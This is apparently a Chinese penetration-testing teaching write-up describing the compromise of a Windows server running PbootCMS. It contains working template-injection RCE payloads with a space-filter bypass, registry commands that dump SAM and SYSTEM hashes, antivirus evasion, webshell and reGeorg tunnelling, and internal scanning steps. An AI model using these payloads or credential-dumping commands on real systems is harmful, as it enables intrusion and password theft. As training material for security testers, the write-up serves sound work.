实战RCE到玄学上线 - 渗透测试教学文档<\/h1>

1. RCE漏洞利用<\/h2>

1.1 漏洞发现<\/h3>
目标系统使用PbootCMS，通过信息收集发现其后台界面并确认版本<\/li>
搜索对应版本漏洞发现存在RCE漏洞<\/li> <\/ul>
1.2 漏洞验证<\/h3>
使用payload验证漏洞存在性：
{pboot<\/span>:<\/span>if<\/span>(phpinfo<\/span>());}{\/<\/span>pboot<\/span>:<\/span>if<\/span>}
<\/span><\/span><\/code><\/pre><\/li>
确认执行权限为SYSTEM级别<\/li>
<\/ul>
1.3 命令执行限制<\/h3>

发现命令执行存在空格限制：

可执行命令：ipconfig<\/code>、whoami<\/code><\/li>
不可执行命令：net user<\/code>、net%20user<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
1.4 绕过空格限制<\/h3>

使用回车符替代空格来绕过限制<\/li>
<\/ul>
2. 获取Webshell<\/h2>
2.1 Webshell上传<\/h3>

由于命令执行受限，选择上传PHP Webshell<\/li>
使用回车符绕过空格限制上传Webshell<\/li>
<\/ul>
2.2 环境分析<\/h3>

发现系统存在360安全防护<\/li>
Webshell权限为SYSTEM但仍无法终止360进程<\/li>
Webshell环境下无法调用Powershell<\/li>
<\/ul>
3. 密码获取技术<\/h2>
3.1 传统工具尝试<\/h3>

尝试上传Procdump、mimikatz、Pwdump均被360拦截<\/li>
<\/ul>
3.2 注册表导出方法<\/h3>

导出注册表：
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
<\/code><\/pre>
<\/li>
本地使用mimikatz解析获取NTLM-hash<\/li>
<\/ol>
3.3 密码破解尝试<\/h3>

系统启用了密码复杂度要求<\/li>
尝试破解NTLM-hash未成功<\/li>
<\/ul>
4. 用户添加技术<\/h2>
4.1 命令执行限制<\/h3>

发现命令执行存在时间限制（上午可执行，下午不可执行）<\/li>
<\/ul>
4.2 冰蝎工具利用<\/h3>

使用冰蝎虚拟终端成功添加用户<\/li>
注意：冰蝎的"命令执行"功能与菜刀一样受限<\/li>
<\/ul>
5. 内网探测技术<\/h2>
5.1 ARP表分析<\/h3>

查看ARP缓存表获取内网通信主机信息：
arp -a
<\/code><\/pre>
<\/li>
<\/ul>
5.2 内网扫描<\/h3>

使用ping命令扫描内网网段：
for \/L %i in (1,1,254) do @ping -n 1 192.168.0.%i | find "TTL="
<\/code><\/pre>
<\/li>
<\/ul>
6. 内网穿透技术<\/h2>
6.1 reGeorg工具使用<\/h3>

上传reGeorg的PHP脚本到Web目录<\/li>
服务器端执行：
.\/reGeorgSocksProxy.py -p [端口] -l [服务器IP] -u http:\/\/site\/tunnel.nosocket.php
<\/code><\/pre>
<\/li>
<\/ol>
6.2 代理配置<\/h3>

配置proxychains进行内网访问<\/li>
<\/ul>
7. 内网主机扫描<\/h2>
7.1 服务扫描<\/h3>

使用nmap通过代理扫描内网主机：
proxychains nmap -sT -Pn 192.168.0.66
<\/code><\/pre>
<\/li>
<\/ul>
7.2 服务测试<\/h3>

测试SMB服务（尝试17-010漏洞）<\/li>
尝试爆破1433(SQL)、3389(RDP)端口<\/li>
尝试使用获取的NTLM-hash进行Hash碰撞攻击<\/li>
<\/ul>
8. 玄学上线技术<\/h2>
8.1 时间因素影响<\/h3>

发现命令执行成功率与时间相关（晚上成功执行）<\/li>
<\/ul>
8.2 Powershell上线<\/h3>

在Webshell中成功执行Powershell上线命令<\/li>
<\/ul>
8.3 密码抓取<\/h3>

成功抓取到管理员密码（包含大小写字母、数字和特殊字符）<\/li>
<\/ul>
9. 防御规避技术<\/h2>
9.1 绕过360防护<\/h3>

发现360对传统渗透工具拦截严格<\/li>
使用注册表导出等非传统方法规避检测<\/li>
<\/ul>
9.2 执行时间选择<\/h3>

不同时间段执行成功率不同，选择合适时间进行操作<\/li>
<\/ul>
10. 经验总结<\/h2>

RCE利用<\/strong>：CMS版本漏洞利用前需充分验证，注意执行环境限制<\/li>
绕过技巧<\/strong>：使用特殊字符（如回车）替代空格可绕过部分限制<\/li>
权限维持<\/strong>：当直接上线受阻时，多尝试不同方法（Webshell、添加用户等）<\/li>
内网渗透<\/strong>：结合ARP表和主动扫描获取内网信息<\/li>
工具选择<\/strong>：不同工具在不同环境下效果差异大（冰蝎虚拟终端优于命令执行）<\/li>
时间因素<\/strong>：渗透测试结果可能受时间因素影响，需多次尝试<\/li>
防御规避<\/strong>：传统工具被拦截时，考虑使用系统自带功能或非标准方法<\/li>
<\/ol>
附录：关键Payload<\/h2>


PbootCMS RCE验证：<\/p>
{pboot<\/span>:<\/span>if<\/span>(system<\/span>('whoami'<\/span>));}{\/<\/span>pboot<\/span>:<\/span>if<\/span>}
<\/span><\/span><\/code><\/pre><\/li>

带空格的命令执行尝试：<\/p>
{pboot<\/span>:<\/span>if<\/span>(system<\/span>('net user'<\/span>));}{\/<\/span>pboot<\/span>:<\/span>if<\/span>}
<\/span><\/span><\/code><\/pre><\/li>

使用回车替代空格（示例）：<\/p>
{pboot<\/span>:<\/span>if<\/span>(system<\/span>('net'<\/span>.<\/span>"<\/span>\r<\/span>"<\/span>.<\/span>'user'<\/span>));}{\/<\/span>pboot<\/span>:<\/span>if<\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>